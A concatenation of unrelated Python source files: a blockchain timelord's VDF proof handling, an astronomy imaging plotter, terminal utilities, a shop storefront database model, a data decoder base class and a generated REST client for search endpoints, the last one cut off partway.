if chain == Chain.CHALLENGE_CHAIN:
cc_vdf = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_vdf = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_ip_vdf = info
icc_ip_proof = proof
assert cc_proof is not None and rc_proof is not None and cc_vdf is not None and rc_vdf is not None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_vdf.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"Do not have correct challenge {rc_challenge.hex()} has" f" {rc_vdf.challenge}")
# This proof is on an outdated challenge, so don't use it
return None
log.debug("Collected end of subslot vdfs.")
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
iters_from_sub_slot_start = cc_vdf.number_of_iterations + self.last_state.get_last_ip()
cc_vdf = dataclasses.replace(cc_vdf, number_of_iterations=iters_from_sub_slot_start)
if icc_ip_vdf is not None:
if self.last_state.peak is not None:
total_iters = (
self.last_state.get_total_iters()
- self.last_state.get_last_ip()
+ self.last_state.get_sub_slot_iters()
)
else:
total_iters = self.last_state.get_total_iters() + self.last_state.get_sub_slot_iters()
iters_from_cb = uint64(total_iters - self.last_state.last_challenge_sb_or_eos_total_iters)
if iters_from_cb > self.last_state.sub_slot_iters:
log.error(f"{self.last_state.peak}")
log.error(f"{self.last_state.subslot_end}")
assert False
assert iters_from_cb <= self.last_state.sub_slot_iters
icc_ip_vdf = dataclasses.replace(icc_ip_vdf, number_of_iterations=iters_from_cb)
icc_sub_slot: Optional[InfusedChallengeChainSubSlot] = (
None if icc_ip_vdf is None else InfusedChallengeChainSubSlot(icc_ip_vdf)
)
if self.last_state.get_deficit() == 0:
assert icc_sub_slot is not None
icc_sub_slot_hash = icc_sub_slot.get_hash()
else:
icc_sub_slot_hash = None
next_ses: Optional[SubEpochSummary] = self.last_state.get_next_sub_epoch_summary()
if next_ses is not None:
log.info(f"Including sub epoch summary{next_ses}")
ses_hash = next_ses.get_hash()
new_sub_slot_iters = next_ses.new_sub_slot_iters
new_difficulty = next_ses.new_difficulty
else:
ses_hash = None
new_sub_slot_iters = None
new_difficulty = None
cc_sub_slot = ChallengeChainSubSlot(cc_vdf, icc_sub_slot_hash, ses_hash, new_sub_slot_iters, new_difficulty)
eos_deficit: uint8 = (
self.last_state.get_deficit()
if self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK > self.last_state.get_deficit() > 0
else self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
)
rc_sub_slot = RewardChainSubSlot(
rc_vdf,
cc_sub_slot.get_hash(),
icc_sub_slot.get_hash() if icc_sub_slot is not None else None,
eos_deficit,
)
eos_bundle = EndOfSubSlotBundle(
cc_sub_slot,
icc_sub_slot,
rc_sub_slot,
SubSlotProofs(cc_proof, icc_ip_proof, rc_proof),
)
if self.server is not None:
msg = make_msg(
ProtocolMessageTypes.new_end_of_sub_slot_vdf,
timelord_protocol.NewEndOfSubSlotVDF(eos_bundle),
)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
log.info(
f"Built end of subslot bundle. cc hash: {eos_bundle.challenge_chain.get_hash()}. New_difficulty: "
f"{eos_bundle.challenge_chain.new_difficulty} New ssi: {eos_bundle.challenge_chain.new_sub_slot_iters}"
)
if next_ses is None or next_ses.new_difficulty is None:
self.unfinished_blocks = self.overflow_blocks.copy()
else:
# No overflow blocks in a new epoch
self.unfinished_blocks = []
self.overflow_blocks = []
self.new_subslot_end = eos_bundle
await self._handle_subslot_end()
async def _handle_failures(self):
if len(self.vdf_failures) > 0:
# This can happen if one of the VDF processes has an issue. In this case, we abort all other
# infusion points and signage points, and go straight to the end of slot, so we avoid potential
# issues with the number of iterations that failed.
failed_chain, proof_label = self.vdf_failures[0]
log.error(
f"Vdf clients failed {self.vdf_failures_count} times. Last failure: {failed_chain}, "
f"label {proof_label}, current: {self.num_resets}"
)
if proof_label == self.num_resets:
await self._reset_chains(only_eos=True)
self.vdf_failure_time = time.time()
self.vdf_failures = []
# If something goes wrong in the VDF client due to a failed thread, we might get stuck in a situation where we
# are waiting for that client to finish. Usually other peers will finish the VDFs and reset us. In the case that
# there are no other timelords, this reset should bring the timelord back to a running state.
if time.time() - self.vdf_failure_time < self.constants.SUB_SLOT_TIME_TARGET * 3:
# If we have recently had a failure, allow some more time to finish the slot (we can be up to 3x slower)
active_time_threshold = self.constants.SUB_SLOT_TIME_TARGET * 3
else:
# If there were no failures recently trigger a reset after 60 seconds of no activity.
# Signage points should be every 9 seconds
active_time_threshold = 60
if time.time() - self.last_active_time > active_time_threshold:
log.error(f"Not active for {active_time_threshold} seconds, restarting all chains")
await self._reset_chains()
async def _manage_chains(self):
async with self.lock:
await asyncio.sleep(5)
await self._reset_chains(True)
while not self._shut_down:
try:
await asyncio.sleep(0.1)
async with self.lock:
await self._handle_failures()
# We've got a new peak, process it.
if self.new_peak is not None:
await self._handle_new_peak()
# Map free vdf_clients to unspawned chains.
await self._map_chains_with_vdf_clients()
async with self.lock:
# Submit pending iterations.
await self._submit_iterations()
not_finished_iters = [
it for it in self.iters_submitted[Chain.REWARD_CHAIN] if it not in self.iters_finished
]
if len(not_finished_iters) == 0:
await asyncio.sleep(0.1)
continue
selected_iter = min(not_finished_iters)
# Check for new infusion point and broadcast it if present.
await self._check_for_new_ip(selected_iter)
# Check for new signage point and broadcast it if present.
await self._check_for_new_sp(selected_iter)
# Check for end of subslot, respawn chains and build EndOfSubslotBundle.
await self._check_for_end_of_subslot(selected_iter)
except Exception:
tb = traceback.format_exc()
log.error(f"Error while handling message: {tb}")
async def _do_process_communication(
self,
chain: Chain,
challenge: bytes32,
initial_form: ClassgroupElement,
ip: str,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
# Data specific only when running in bluebox mode.
bluebox_iteration: Optional[uint64] = None,
header_hash: Optional[bytes32] = None,
height: Optional[uint32] = None,
field_vdf: Optional[uint8] = None,
# Labels a proof to the current state only
proof_label: Optional[int] = None,
):
disc: int = create_discriminant(challenge, self.constants.DISCRIMINANT_SIZE_BITS)
try:
# Depending on the flags 'fast_algorithm' and 'sanitizer_mode',
# the timelord tells the vdf_client what to execute.
async with self.lock:
if self.sanitizer_mode:
writer.write(b"S")
else:
if self.config["fast_algorithm"]:
# Run n-wesolowski (fast) algorithm.
writer.write(b"N")
else:
# Run two-wesolowski (slow) algorithm.
writer.write(b"T")
await writer.drain()
prefix = str(len(str(disc)))
if len(prefix) == 1:
prefix = "00" + prefix
if len(prefix) == 2:
prefix = "0" + prefix
async with self.lock:
writer.write((prefix + str(disc)).encode())
await writer.drain()
# Send initial_form prefixed with its length.
async with self.lock:
writer.write(bytes([len(initial_form.data)]) + initial_form.data)
await writer.drain()
try:
ok = await reader.readexactly(2)
except (asyncio.IncompleteReadError, ConnectionResetError, Exception) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
return None
if ok.decode() != "OK":
return None
log.debug("Got handshake with VDF client.")
if not self.sanitizer_mode:
async with self.lock:
self.allows_iters.append(chain)
else:
async with self.lock:
assert chain is Chain.BLUEBOX
assert bluebox_iteration is not None
prefix = str(len(str(bluebox_iteration)))
if len(str(bluebox_iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(bluebox_iteration)
writer.write(iter_str.encode())
await writer.drain()
# Listen to the client until "STOP" is received.
while True:
try:
data = await reader.readexactly(4)
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
msg = ""
try:
msg = data.decode()
except Exception:
pass
if msg == "STOP":
log.debug(f"Stopped client running on ip {ip}.")
async with self.lock:
writer.write(b"ACK")
await writer.drain()
break
else:
try:
# This must be a proof, 4 bytes is length prefix
length = int.from_bytes(data, "big")
proof = await reader.readexactly(length)
stdout_bytes_io: io.BytesIO = io.BytesIO(bytes.fromhex(proof.decode()))
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
iterations_needed = uint64(int.from_bytes(stdout_bytes_io.read(8), "big", signed=True))
y_size_bytes = stdout_bytes_io.read(8)
y_size = uint64(int.from_bytes(y_size_bytes, "big", signed=True))
y_bytes = stdout_bytes_io.read(y_size)
witness_type = uint8(int.from_bytes(stdout_bytes_io.read(1), "big", signed=True))
proof_bytes: bytes = stdout_bytes_io.read()
# Verifies our own proof just in case
form_size = ClassgroupElement.get_size(self.constants)
output = ClassgroupElement.from_bytes(y_bytes[:form_size])
if not self.sanitizer_mode:
time_taken = time.time() - self.chain_start_time[chain]
ips = int(iterations_needed / time_taken * 10) / 10
log.info(
f"Finished PoT chall:{challenge[:10].hex()}.. {iterations_needed}"
f" iters, "
f"Estimated IPS: {ips}, Chain: {chain}"
)
vdf_info: VDFInfo = VDFInfo(
challenge,
iterations_needed,
output,
)
vdf_proof: VDFProof = VDFProof(
witness_type,
proof_bytes,
self.sanitizer_mode,
)
if not vdf_proof.is_valid(self.constants, initial_form, vdf_info):
log.error("Invalid proof of time!")
if not self.sanitizer_mode:
async with self.lock:
assert proof_label is not None
self.proofs_finished.append((chain, vdf_info, vdf_proof, proof_label))
else:
async with self.lock:
writer.write(b"010")
await writer.drain()
assert header_hash is not None
assert field_vdf is not None
assert height is not None
response = timelord_protocol.RespondCompactProofOfTime(
vdf_info, vdf_proof, header_hash, height, field_vdf
)
if self.server is not None:
message = make_msg(ProtocolMessageTypes.respond_compact_proof_of_time, response)
await self.server.send_to_all([message], NodeType.FULL_NODE)
except ConnectionResetError as e:
log.debug(f"Connection reset with VDF client {e}")
async def _manage_discriminant_queue_sanitizer(self):
while not self._shut_down:
async with self.lock:
try:
while len(self.pending_bluebox_info) > 0 and len(self.free_clients) > 0:
# Select randomly the field_vdf we're creating a compact vdf for.
# This is done because CC_SP and CC_IP are more frequent than
# CC_EOS and ICC_EOS. This guarantees everything is picked uniformly.
target_field_vdf = random.randint(1, 4)
info = next(
(info for info in self.pending_bluebox_info if info.field_vdf == target_field_vdf),
None,
)
if info is None:
# Nothing found with target_field_vdf, just pick the first VDFInfo.
info = self.pending_bluebox_info[0]
ip, reader, writer = self.free_clients[0]
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
Chain.BLUEBOX,
info.new_proof_of_time.challenge,
ClassgroupElement.get_default_element(),
ip,
reader,
writer,
info.new_proof_of_time.number_of_iterations,
info.header_hash,
info.height,
info.field_vdf,
)
)
)
self.pending_bluebox_info.remove(info)
self.free_clients = self.free_clients[1:]
except Exception as e:
log.error(f"Exception manage discriminant queue: {e}")
await asyncio.sleep(0.1)
|
py | b41042bc3b06dc7ceacccefb8732fa49942cacf9 | from autoarray.plot.mat_wrap.visuals import Visuals2D
from autoarray.plot.mat_wrap.include import Include2D
from autoarray.plot.mat_wrap.mat_plot import MatPlot2D
from autoarray.plot.mat_wrap.mat_plot import AutoLabels
from autoarray.plot.abstract_plotters import AbstractPlotter
from autoarray.dataset.imaging import Imaging
from autoarray.structures.grids.two_d.grid_2d_irregular import Grid2DIrregular
class AbstractImagingPlotter(AbstractPlotter):
def __init__(
self,
imaging: Imaging,
mat_plot_2d: MatPlot2D,
visuals_2d: Visuals2D,
include_2d: Include2D,
):
self.imaging = imaging
super().__init__(
mat_plot_2d=mat_plot_2d, include_2d=include_2d, visuals_2d=visuals_2d
)
@property
def visuals_with_include_2d(self) -> Visuals2D:
return self.visuals_2d + self.visuals_2d.__class__(
origin=self.extract_2d(
"origin", Grid2DIrregular(grid=[self.imaging.image.origin])
),
mask=self.extract_2d("mask", self.imaging.image.mask),
border=self.extract_2d(
"border", self.imaging.image.mask.border_grid_sub_1.binned
),
)
def figures_2d(
self,
image: bool = False,
noise_map: bool = False,
psf: bool = False,
inverse_noise_map: bool = False,
signal_to_noise_map: bool = False,
absolute_signal_to_noise_map: bool = False,
potential_chi_squared_map: bool = False,
):
"""Plot each attribute of the imaging data_type as individual figures one by one (e.g. the dataset, noise_map, PSF, \
Signal-to_noise-map, etc).
Set *autolens.data_type.array.mat_plot_2d.mat_plot_2d* for a description of all innput parameters not described below.
Parameters
-----------
imaging : data_type.ImagingData
The imaging data_type, which includes the observed data_type, noise_map, PSF, signal-to-noise_map, etc.
include_origin : True
If true, the include_origin of the dataset's coordinate system is plotted as a 'x'.
"""
if image:
self.mat_plot_2d.plot_array(
array=self.imaging.image,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(title="Image", filename="image_2d"),
)
if noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels("Noise-Map", filename="noise_map"),
)
if psf:
self.mat_plot_2d.plot_array(
array=self.imaging.psf,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(title="Point Spread Function", filename="psf"),
)
if inverse_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.inverse_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Inverse Noise-Map", filename="inverse_noise_map"
),
)
if signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.signal_to_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Signal-To-Noise Map", filename="signal_to_noise_map"
),
)
if absolute_signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.absolute_signal_to_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Absolute Signal-To-Noise Map",
filename="absolute_signal_to_noise_map",
),
)
if potential_chi_squared_map:
self.mat_plot_2d.plot_array(
array=self.imaging.potential_chi_squared_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Potential Chi-Squared Map",
filename="potential_chi_squared_map",
),
)
def subplot(
self,
image: bool = False,
noise_map: bool = False,
psf: bool = False,
signal_to_noise_map: bool = False,
inverse_noise_map: bool = False,
absolute_signal_to_noise_map: bool = False,
potential_chi_squared_map: bool = False,
auto_filename: str = "subplot_imaging",
):
self._subplot_custom_plot(
image=image,
noise_map=noise_map,
psf=psf,
signal_to_noise_map=signal_to_noise_map,
inverse_noise_map=inverse_noise_map,
absolute_signal_to_noise_map=absolute_signal_to_noise_map,
potential_chi_squared_map=potential_chi_squared_map,
auto_labels=AutoLabels(filename=auto_filename),
)
def subplot_imaging(self):
self.subplot(
image=True,
noise_map=True,
psf=True,
signal_to_noise_map=True,
inverse_noise_map=True,
potential_chi_squared_map=True,
)
class ImagingPlotter(AbstractImagingPlotter):
def __init__(
self,
imaging: Imaging,
mat_plot_2d: MatPlot2D = MatPlot2D(),
visuals_2d: Visuals2D = Visuals2D(),
include_2d: Include2D = Include2D(),
):
super().__init__(
imaging=imaging,
mat_plot_2d=mat_plot_2d,
include_2d=include_2d,
visuals_2d=visuals_2d,
)
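# Hedged usage sketch (editor's note, not part of the module). `imaging` is assumed to be an
# already-loaded autoarray Imaging dataset (e.g. built from FITS files elsewhere).
#
#   plotter = ImagingPlotter(imaging=imaging)
#   plotter.figures_2d(image=True, noise_map=True)   # individual figures
#   plotter.subplot_imaging()                        # combined summary subplot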
|
py | b41042e5988e8d27b58649ccaf22e396c4b031cb | import copy
import subprocess
import sys
import unicodedata
def disable_colored_func(text, *args, **kwargs):
return text
try:
from termcolor import colored as colored_func
except ImportError:
print 'You should run "pip install termcolor" to fully utilize these utilities.'
colored_func = disable_colored_func
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
unsupported_platform = (sys.platform in ('win32', 'Pocket PC'))
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if unsupported_platform or not is_a_tty:
return False
return True
if not supports_color():
colored_func = disable_colored_func
class Colored(object):
disabled = False
def __call__(self, *args, **kwargs):
if self.disabled:
return disable_colored_func(*args, **kwargs)
return colored_func(*args, **kwargs)
colored = Colored()
def force_unicode(obj, encoding='utf-8'):
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding)
        # Normalize to NFKC so that characters which NFKD would split into two code points are composed into one.
obj = unicodedata.normalize('NFKC', obj)
return obj
def force_str(obj, encoding='utf-8'):
if isinstance(obj, basestring):
if not isinstance(obj, str):
obj = obj.encode(encoding)
return obj
def console(obj):
sys.stdout.write(force_str(obj))
class AccumulatorDict(dict):
    def __init__(self, default, *args, **kwargs):
        self.__default = default
        # Forward any initial mapping/kwargs to dict instead of silently dropping them.
        super(AccumulatorDict, self).__init__(*args, **kwargs)
def __getitem__(self, key):
if key not in self:
self[key] = copy.copy(self.__default)
return super(AccumulatorDict, self).__getitem__(key)
def memoize(func):
def _(self, *args, **kwargs):
if not hasattr(self, '__memoize_cache'):
self.__memoize_cache = AccumulatorDict(AccumulatorDict({}))
        # Sort the keyword arguments so the cache key does not depend on kwargs ordering.
        key = tuple([ tuple(args), tuple([ tuple([x, y]) for x, y in sorted(kwargs.items()) ]) ])
if key not in self.__memoize_cache[func]:
self.__memoize_cache[func][key] = func(self, *args, **kwargs)
return self.__memoize_cache[func][key]
return _
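# Illustrative sketch (not part of the original utilities): `memoize` caches results per
# instance, keyed by the call arguments. The `fib` method here is a made-up example.
class MemoizeExample(object):
    @memoize
    def fib(self, n):
        if n < 2:
            return n
        return self.fib(n - 1) + self.fib(n - 2)
# MemoizeExample().fib(30) evaluates each fib(k) once; repeated calls hit the cache.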
def terminal_dimensions():
try:
# This probably does not work on windows, but it should work just about
# everywhere else.
p = subprocess.Popen(['stty', 'size'], stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate(None)
stdout = force_unicode(stdout)
stderr = force_unicode(stderr)
rows, columns = [ int(x) for x in stdout.split() ]
    except Exception:
rows, columns = 40, 79
return rows, columns
|
py | b4104472c80a3ccb18e9d8e7106bb2d3d34931e8 | """
byceps.services.shop.storefront.dbmodels
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
from ....database import db
from ....util.instances import ReprBuilder
# Make shop catalog tables available for database creation.
from ..catalog.dbmodels import Catalog
from ..catalog.transfer.models import CatalogID
from ..order.transfer.number import OrderNumberSequenceID
from ..shop.transfer.models import ShopID
from .transfer.models import StorefrontID
class Storefront(db.Model):
"""A storefront.
The entrypoint from a site to a shop.
"""
__tablename__ = 'shop_storefronts'
id = db.Column(db.UnicodeText, primary_key=True)
shop_id = db.Column(db.UnicodeText, db.ForeignKey('shops.id'), index=True, nullable=False)
catalog_id = db.Column(db.Uuid, db.ForeignKey('shop_catalogs.id'), nullable=True)
order_number_sequence_id = db.Column(db.Uuid, db.ForeignKey('shop_order_number_sequences.id'), nullable=False)
closed = db.Column(db.Boolean, nullable=False)
def __init__(
self,
storefront_id: StorefrontID,
shop_id: ShopID,
order_number_sequence_id: OrderNumberSequenceID,
closed: bool,
*,
catalog_id: Optional[CatalogID] = None,
) -> None:
self.id = storefront_id
self.shop_id = shop_id
self.catalog_id = catalog_id
self.order_number_sequence_id = order_number_sequence_id
self.closed = closed
def __repr__(self) -> str:
return ReprBuilder(self) \
.add_with_lookup('id') \
.add_with_lookup('shop_id') \
.build()
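# Construction sketch (not part of the original module): the ID values are made up and a
# real caller would add the new object to the database session afterwards.
def _build_example_storefront(
    order_number_sequence_id: OrderNumberSequenceID,
) -> Storefront:
    return Storefront(
        StorefrontID('acmecon-2022-storefront'),
        ShopID('acmecon-2022'),
        order_number_sequence_id,
        closed=False,
    )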
|
py | b4104577bf001755e0f6039fead9259f5d1624c7 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains helper functions and classes necessary for decoding data.
While data providers read data from disk, sstables or other formats, data
decoders decode the data (if necessary). A data decoder is provided with a
serialized or encoded piece of data as well as a list of items and
returns a set of tensors, each of which correspond to the requested list of
items extracted from the data:
def Decode(self, data, items):
...
For example, if data is a compressed map, the implementation might be:
def Decode(self, data, items):
decompressed_map = _Decompress(data)
outputs = []
for item in items:
outputs.append(decompressed_map[item])
return outputs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class DataDecoder(object):
"""An abstract class which is used to decode data for a provider."""
@abc.abstractmethod
def decode(self, data, items):
"""Decodes the data to returns the tensors specified by the list of items.
Args:
data: A possibly encoded data format.
items: A list of strings, each of which indicate a particular data type.
Returns:
A list of `Tensors`, whose length matches the length of `items`, where
each `Tensor` corresponds to each item.
Raises:
ValueError: If any of the items cannot be satisfied.
"""
pass
@abc.abstractmethod
def list_items(self):
"""Lists the names of the items that the decoder can decode.
Returns:
A list of string names.
"""
pass
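# Minimal concrete decoder sketch (not part of the library): it assumes `data` is already
# a Python dict mapping item names to tensors, so decoding reduces to dictionary lookups.
class DictDataDecoder(DataDecoder):
  """Example decoder treating the encoded data as a dict of tensors."""

  def decode(self, data, items):
    return [data[item] for item in items]

  def list_items(self):
    # A real decoder would enumerate every item it knows how to produce.
    return ['image', 'label']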
|
py | b410465fc4e1677105c2b150d954fa058048efaf | #!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.10.1
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchesV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_search(self, owner, body, **kwargs): # noqa: E501
"""Create search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_search(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_search_with_http_info(owner, body, **kwargs) # noqa: E501
def create_search_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_search_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_search(self, owner, uuid, **kwargs): # noqa: E501
"""Delete search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_search(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_search_with_http_info(owner, uuid, **kwargs) # noqa: E501
def delete_search_with_http_info(self, owner, uuid, **kwargs): # noqa: E501
"""Delete search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_search_with_http_info(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'uuid'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_search`") # noqa: E501
# verify the required parameter 'uuid' is set
if self.api_client.client_side_validation and ('uuid' not in local_var_params or # noqa: E501
local_var_params['uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `uuid` when calling `delete_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{uuid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_search(self, owner, uuid, **kwargs): # noqa: E501
"""Get search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_search(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
